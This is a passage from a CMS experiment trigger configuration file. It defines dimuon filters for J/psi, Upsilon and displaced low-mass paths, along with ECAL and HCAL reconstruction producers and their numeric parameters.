\"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerBs6\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDoubleMu4p5LowMassDisplaced = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n 
offset = cms.uint32( 0 )\n)\nhltDoubleMu4p5LowMassDisplacedL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.2 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 6.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 4.5 ),\n MinInvMass = cms.double( 1.0 ),\n MaxInvMass = cms.double( 4.8 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( False )\n)\nhltDisplacedmumuVtxProducerDoubleMu4p5LowMass = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDoubleMu4p5LowMassDisplacedL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltDisplacedmumuFilterDoubleMu4p5LowMass = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 3.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.15 ),\n MinCosinePointingAngle = cms.double( 0.9 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDoubleMu4p5LowMass\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDoubleMu5LowMassDisplaced = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDoubleMu5LowMassDisplacedL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.2 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 6.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 5.0 ),\n MinInvMass = cms.double( 1.0 ),\n MaxInvMass = cms.double( 4.8 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( False )\n)\nhltDisplacedmumuVtxProducerDoubleMu5LowMass = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDoubleMu5LowMassDisplacedL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltDisplacedmumuFilterDoubleMu5LowMass = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n 
FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 3.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.15 ),\n MinCosinePointingAngle = cms.double( 0.9 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDoubleMu5LowMass\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDimuon0Jpsi = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltJpsiL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 0.0 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 2.8 ),\n MaxInvMass = cms.double( 3.35 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( True )\n)\nhltDisplacedmumuVtxProducerJpsi0 = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltJpsiL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterJpsi = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerJpsi0\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDimuon0JpsiNoVertexing = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltJpsiNoVertexingL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 0.0 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 2.8 ),\n MaxInvMass = cms.double( 3.35 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( True )\n)\nhltPreDimuon0Upsilon = 
cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltUpsilonL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 0.0 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 8.5 ),\n MaxInvMass = cms.double( 11.5 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 2.5 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( True )\n)\nhltDisplacedmumuVtxProducerUpsilon = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltUpsilonL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterUpsilon = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerUpsilon\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltL1sL1DoubleMu3 = cms.EDFilter( \"HLTLevel1GTSeed\",\n L1UseL1TriggerObjectMaps = cms.bool( True ),\n L1NrBxInEvent = cms.int32( 3 ),\n L1TechTriggerSeeding = cms.bool( False ),\n L1UseAliasesForSeeding = cms.bool( True ),\n L1SeedsLogicalExpression = cms.string( \"L1_DoubleMu3\" ),\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n L1GtObjectMapTag = cms.InputTag( \"hltL1GtObjectMap\" ),\n L1CollectionsTag = cms.InputTag( \"hltL1extraParticles\" ),\n L1MuonCollectionTag = cms.InputTag( \"hltL1extraParticles\" ),\n saveTags = cms.bool( True )\n)\nhltPreDimuon6LowMass = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltL1DiMuon6L1Filtered0 = cms.EDFilter( \"HLTMuonL1Filter\",\n CandTag = cms.InputTag( \"hltL1extraParticles\" ),\n PreviousCandTag = cms.InputTag( \"hltL1sL1DoubleMu3\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 3.0 ),\n MinN = cms.int32( 2 ),\n ExcludeSingleSegmentCSC = cms.bool( False ),\n CSCTFtag = cms.InputTag( \"unused\" ),\n saveTags = cms.bool( False ),\n SelectQualities = cms.vint32( )\n)\nhltL2DiMuon6L2PreFiltered0 = cms.EDFilter( \"HLTMuonL2PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL2MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltL1DiMuon6L1Filtered0\" ),\n SeedMapTag = cms.InputTag( \"hltL2Muons\" ),\n MinN = cms.int32( 2 ),\n MaxEta = cms.double( 2.5 ),\n MaxDr = cms.double( 9999.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 3.0 ),\n NSigmaPt = cms.double( 0.0 
),\n saveTags = cms.bool( True ),\n AbsEtaBins = cms.vdouble( 5.0 ),\n MinNstations = cms.vint32( 0 ),\n MinNhits = cms.vint32( 0 )\n)\nhltEcalRawToRecHitFacility = cms.EDProducer( \"EcalRawToRecHitFacility\",\n sourceTag = cms.InputTag( \"rawDataCollector\" ),\n workerName = cms.string( \"\" )\n)\nhltEcalRegionalMuonsFEDs = cms.EDProducer( \"EcalRawToRecHitRoI\",\n sourceTag = cms.InputTag( \"hltEcalRawToRecHitFacility\" ),\n type = cms.string( \"candidate\" ),\n doES = cms.bool( False ),\n sourceTag_es = cms.InputTag( \"NotNeededoESfalse\" ),\n esInstance = cms.untracked.string( \"es\" ),\n MuJobPSet = cms.PSet( ),\n JetJobPSet = cms.VPSet( \n ),\n EmJobPSet = cms.VPSet( \n ),\n CandJobPSet = cms.VPSet( \n cms.PSet( bePrecise = cms.bool( False ),\n propagatorNameToBePrecise = cms.string( \"\" ),\n epsilon = cms.double( 0.01 ),\n regionPhiMargin = cms.double( 0.3 ),\n cType = cms.string( \"chargedcandidate\" ),\n Source = cms.InputTag( \"hltL2MuonCandidates\" ),\n Ptmin = cms.double( 0.0 ),\n regionEtaMargin = cms.double( 0.3 )\n )\n )\n)\nhltEcalRegionalMuonsRecHit = cms.EDProducer( \"EcalRawToRecHitProducer\",\n lazyGetterTag = cms.InputTag( \"hltEcalRawToRecHitFacility\" ),\n sourceTag = cms.InputTag( \"hltEcalRegionalMuonsFEDs\" ),\n splitOutput = cms.bool( True ),\n EBrechitCollection = cms.string( \"EcalRecHitsEB\" ),\n EErechitCollection = cms.string( \"EcalRecHitsEE\" ),\n rechitCollection = cms.string( \"NotNeededsplitOutputTrue\" ),\n cleaningConfig = cms.PSet( \n tightenCrack_e1_double = cms.double( 2.0 ),\n tightenCrack_e6e2_double = cms.double( 3.0 ),\n e4e1Threshold_endcap = cms.double( 0.3 ),\n tightenCrack_e4e1_single = cms.double( 3.0 ),\n cThreshold_barrel = cms.double( 4.0 ),\n e4e1Threshold_barrel = cms.double( 0.08 ),\n tightenCrack_e1_single = cms.double( 2.0 ),\n e4e1_b_barrel = cms.double( -0.024 ),\n e4e1_a_barrel = cms.double( 0.04 ),\n ignoreOutOfTimeThresh = cms.double( 1000000.0 ),\n cThreshold_endcap = cms.double( 15.0 ),\n e4e1_b_endcap = cms.double( -0.0125 ),\n e4e1_a_endcap = cms.double( 0.02 ),\n e6e2thresh = cms.double( 0.04 ),\n cThreshold_double = cms.double( 10.0 ),\n swissCrossThreshold = cms.double( 0.95 ),\n recHitThreshold = cms.double( 4.0 ),\n useieta85 = cms.bool( True )\n )\n)\nhltHcalDigis = cms.EDProducer( \"HcalRawToDigi\",\n InputLabel = cms.InputTag( \"rawDataCollector\" ),\n UnpackCalib = cms.untracked.bool( True ),\n UnpackZDC = cms.untracked.bool( True ),\n UnpackTTP = cms.untracked.bool( False ),\n silent = cms.untracked.bool( True ),\n ComplainEmptyData = cms.untracked.bool( False ),\n FEDs = cms.untracked.vint32( ),\n firstSample = cms.int32( 0 ),\n lastSample = cms.int32( 9 ),\n FilterDataQuality = cms.bool( True )\n)\nhltHbhereco = cms.EDProducer( \"HcalHitReconstructor\",\n correctForTimeslew = cms.bool( True ),\n correctForPhaseContainment = cms.bool( True ),\n correctionPhaseNS = cms.double( 13.0 ),\n digiLabel = cms.InputTag( \"hltHcalDigis\" ),\n correctTiming = cms.bool( False ),\n setNoiseFlags = cms.bool( False ),\n setHSCPFlags = cms.bool( False ),\n setSaturationFlags = cms.bool( False ),\n setTimingTrustFlags = cms.bool( False ),\n setPulseShapeFlags = cms.bool( False ),\n dropZSmarkedPassed = cms.bool( True ),\n firstAuxTS = cms.int32( 4 ),\n firstSample = cms.int32( 4 ),\n samplesToAdd = cms.int32( 4 ),\n tsFromDB = cms.bool( True ),\n useLeakCorrection = cms.bool( False ),\n Subdetector = cms.string( \"HBHE\" ),\n setTimingShapedCutsFlags = cms.bool( False ),\n digistat = cms.PSet( ),\n HFInWindowStat = cms.PSet( 
),\n S9S1stat = cms.PSet( \n longETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n shortEnergyParams = cms.vdouble( 35.1773, 35.37, 35.7933, 36.4472, 37.3317, 38.4468, 39.7925, 41.3688, 43.1757, 45.2132, 47.4813, 49.98, 52.7093 ),\n flagsToSkip = cms.int32( 24 ),\n shortETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_optimumSlope = cms.vdouble( -99999.0, 0.0164905, 0.0238698, 0.0321383, 0.041296, 0.0513428, 0.0622789, 0.0741041, 0.0868186, 0.100422, 0.135313, 0.136289, 0.0589927 ),\n longEnergyParams = cms.vdouble( 43.5, 45.7, 48.32, 51.36, 54.82, 58.7, 63.0, 67.72, 72.86, 78.42, 84.4, 90.8, 97.62 ),\n long_optimumSlope = cms.vdouble( -99999.0, 0.0164905, 0.0238698, 0.0321383, 0.041296, 0.0513428, 0.0622789, 0.0741041, 0.0868186, 0.100422, 0.135313, 0.136289, 0.0589927 ),\n isS8S1 = cms.bool( False ),\n HcalAcceptSeverityLevel = cms.int32( 9 )\n ),\n S8S1stat = cms.PSet( \n longETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n shortEnergyParams = cms.vdouble( 40.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0 ),\n flagsToSkip = cms.int32( 16 ),\n shortETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_optimumSlope = cms.vdouble( 0.3, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1 ),\n longEnergyParams = cms.vdouble( 40.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0 ),\n long_optimumSlope = cms.vdouble( 0.3, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1 ),\n isS8S1 = cms.bool( True ),\n HcalAcceptSeverityLevel = cms.int32( 9 )\n ),\n PETstat = cms.PSet( \n longETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_R_29 = cms.vdouble( 0.8 ),\n shortEnergyParams = cms.vdouble( 35.1773, 35.37, 35.7933, 36.4472, 37.3317, 38.4468, 39.7925, 41.3688, 43.1757, 45.2132, 47.4813, 49.98, 52.7093 ),\n flagsToSkip = cms.int32( 0 ),\n short_R = cms.vdouble( 0.8 ),\n shortETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n long_R_29 = cms.vdouble( 0.8 ),\n longEnergyParams = cms.vdouble( 43.5, 45.7, 48.32, 51.36, 54.82, 58.7, 63.0, 67.72, 72.86, 78.42, 84.4, 90.8, 97.62 ),\n long_R = cms.vdouble( 0.98 ),\n HcalAcceptSeverityLevel = cms.int32( 9 )\n ),\n saturationParameters = cms.PSet( maxADCvalue = cms.int32( 127 ) ),\n timingshapedcutsParameters = cms.PSet( \n ignorelowest = cms.bool( True ),\n win_offset = cms.double( 0.0 ),\n ignorehighest = cms.bool( False ),\n win_gain = cms.double( 1.0 ),\n tfilterEnvelope = cms.vdouble( 4.0, 12.04, 13.0, 10.56, 23.5, 8.82, 37.0, 7.38, 56.0, 6.3, 81.0, 5.64, 114.5, 5.44, 175.5, 5.38, 350.5, 5.14 )\n ),\n flagParameters = cms.PSet( \n nominalPedestal = cms.double( 3.0 ),\n hitMultiplicityThreshold = cms.int32( 17 ),\n hitEnergyMinimum = cms.double( 1.0 ),\n pulseShapeParameterSets = cms.VPSet( \n cms.PSet( pulseShapeParameters = cms.vdouble( 0.0, 100.0, -50.0, 0.0, -15.0, 0.15 ) ),\n cms.PSet( pulseShapeParameters = cms.vdouble( 100.0, 2000.0, -50.0, 0.0, -5.0, 0.05 ) ),\n cms.PSet( pulseShapeParameters = cms.vdouble( 2000.0, 1000000.0, -50.0, 0.0, 95.0, 0.0 ) ),\n cms.PSet( pulseShapeParameters = cms.vdouble( -1000000.0, 1000000.0, 45.0, 0.1, 1000000.0, 0.0 ) )\n )\n ),\n hscpParameters = cms.PSet( \n slopeMax = cms.double( -0.6 ),\n r1Max = cms.double( 1.0 ),\n r1Min = cms.double( 0.15 ),\n 
TimingEnergyThreshold = cms.double( 30.0 ),\n slopeMin = cms.double( -1.5 ),\n outerMin = cms.double( 0.0 ),\n outerMax = cms.double( 0.1 ),\n fracLeaderMin = cms.double( 0.4 ),\n r2Min = cms.double( 0.1 ),\n r2Max = cms.double( 0.5 ),\n fracLeaderMax = cms.double( 0.7 )\n ),\n pulseShapeParameters = cms.PSet( ),\n hfTimingTrustParameters = cms.PSet( \n hfTimingTrustLevel2 = cms.int32( 4 ),\n hfTimingTrustLevel1 = cms.int32( 1 )\n ),\n firstAuxOffset = cms.int32( 0 )\n)\nhltHfreco = cms.EDProducer( \"HcalHitReconstructor\",\n correctForTimeslew = cms.bool( False ),\n correctForPhaseContainment = cms.bool( False ),\n correctionPhaseNS = cms.double( 0.0 ),\n digiLabel = cms.InputTag( \"hltHcalDigis\" ),\n correctTiming = cms.bool( False ),\n setNoiseFlags = cms.bool( True ),\n setHSCPFlags = cms.bool( False ),\n setSaturationFlags = cms.bool( False ),\n setTimingTrustFlags = cms.bool( False ),\n setPulseShapeFlags = cms.bool( False ),\n dropZSmarkedPassed = cms.bool( True ),\n firstAuxTS = cms.int32( 1 ),\n firstSample = cms.int32( 2 ),\n samplesToAdd = cms.int32( 2 ),\n tsFromDB = cms.bool( True ),\n useLeakCorrection = cms.bool( False ),\n Subdetector = cms.string( \"HF\" ),\n setTimingShapedCutsFlags = cms.bool( False ),\n digistat = cms.PSet( \n HFdigiflagFirstSample = cms.int32( 1 ),\n HFdigiflagMinEthreshold = cms.double( 40.0 ),\n HFdigiflagSamplesToAdd = cms.int32( 3 ),\n HFdigiflagCoef0 = cms.double( 0.93 ),\n HFdigiflagCoef2 = cms.double( -0.012667 ),\n HFdigiflagCoef1 = cms.double( -0.38275 ),\n HFdigiflagExpectedPeak = cms.int32( 2 )\n ),\n HFInWindowStat = cms.PSet( \n hflongEthresh = cms.double( 40.0 ),\n hflongMinWindowTime = cms.vdouble( -10.0 ),\n hfshortEthresh = cms.double( 40.0 ),\n hflongMaxWindowTime = cms.vdouble( 10.0 ),\n hfshortMaxWindowTime = cms.vdouble( 10.0 ),\n hfshortMinWindowTime = cms.vdouble( -12.0 )\n ),\n S9S1stat = cms.PSet( \n longETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n shortEnergyParams = cms.vdouble( 35.1773, 35.37, 35.7933, 36.4472, 37.3317, 38.4468, 39.7925, 41.3688, 43.1757, 45.2132, 47.4813, 49.98, 52.7093 ),\n flagsToSkip = cms.int32( 24 ),\n shortETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_optimumSlope = cms.vdouble( -99999.0, 0.0164905, 0.0238698, 0.0321383, 0.041296, 0.0513428, 0.0622789, 0.0741041, 0.0868186, 0.100422, 0.135313, 0.136289, 0.0589927 ),\n longEnergyParams = cms.vdouble( 43.5, 45.7, 48.32, 51.36, 54.82, 58.7, 63.0, 67.72, 72.86, 78.42, 84.4, 90.8, 97.62 ),\n long_optimumSlope = cms.vdouble( -99999.0, 0.0164905, 0.0238698, 0.0321383, 0.041296, 0.0513428, 0.0622789, 0.0741041, 0.0868186, 0.100422, 0.135313, 0.136289, 0.0589927 ),\n isS8S1 = cms.bool( False ),\n HcalAcceptSeverityLevel = cms.int32( 9 )\n ),\n S8S1stat = cms.PSet( \n longETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n shortEnergyParams = cms.vdouble( 40.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0 ),\n flagsToSkip = cms.int32( 16 ),\n shortETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_optimumSlope = cms.vdouble( 0.3, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1 ),\n longEnergyParams = cms.vdouble( 40.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0 ),\n long_optimumSlope = cms.vdouble( 0.3, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1 ),\n isS8S1 = cms.bool( 
True ),\n HcalAcceptSeverityLevel = cms.int32( 9 )\n ),\n PETstat = cms.PSet( \n longETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_R_29 = cms.vdouble( 0.8 ),\n shortEnergyParams = cms.vdouble( 35.1773, 35.37, 35.7933, 36.4472, 37.3317, 38.4468, 39.7925, 41.3688, 43.1757, 45.2132, 47.4813, 49.98, 52.7093 ),\n flagsToSkip = cms.int32( 0 ),\n short_R = cms.vdouble( 0.8 ),\n shortETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n long_R_29 = cms.vdouble( 0.8 ),\n longEnergyParams = cms.vdouble( 43.5, 45.7, 48.32, 51.36, 54.82, 58.7, 63.0, 67.72, 72.86, 78.42, 84.4, 90.8, 97.62 ),\n long_R = cms.vdouble( 0.98 ),\n HcalAcceptSeverityLevel = cms.int32( 9 )\n ),\n saturationParameters = cms.PSet( maxADCvalue = cms.int32( 127 ) ),\n timingshapedcutsParameters = cms.PSet( \n ignorelowest = cms.bool( True ),\n win_offset = cms.double( 0.0 ),\n ignorehighest = cms.bool( False ),\n win_gain = cms.double( 1.0 ),\n tfilterEnvelope = cms.vdouble( 4.0, 12.04, 13.0, 10.56, 23.5, 8.82, 37.0, 7.38, 56.0, 6.3, 81.0, 5.64, 114.5, 5.44, 175.5, 5.38, 350.5, 5.14 )\n ),\n flagParameters = cms.PSet( \n nominalPedestal = cms.double( 3.0 ),\n hitMultiplicityThreshold = cms.int32( 17 ),\n hitEnergyMinimum = cms.double( 1.0 ),\n pulseShapeParameterSets = cms.VPSet( \n cms.PSet( pulseShapeParameters = cms.vdouble( 0.0, 100.0, -50.0, 0.0, -15.0, 0.15 ) ),\n cms.PSet( pulseShapeParameters = cms.vdouble( 100.0, 2000.0, -50.0, 0.0, -5.0, 0.05 ) ),\n cms.PSet( pulseShapeParameters = cms.vdouble( 2000.0, 1000000.0, -50.0, 0.0, 95.0, 0.0 ) ),\n cms.PSet( pulseShapeParameters = cms.vdouble( -1000000.0, 1000000.0, 45.0, 0.1, 1000000.0, 0.0 ) )\n )\n ),\n hscpParameters = 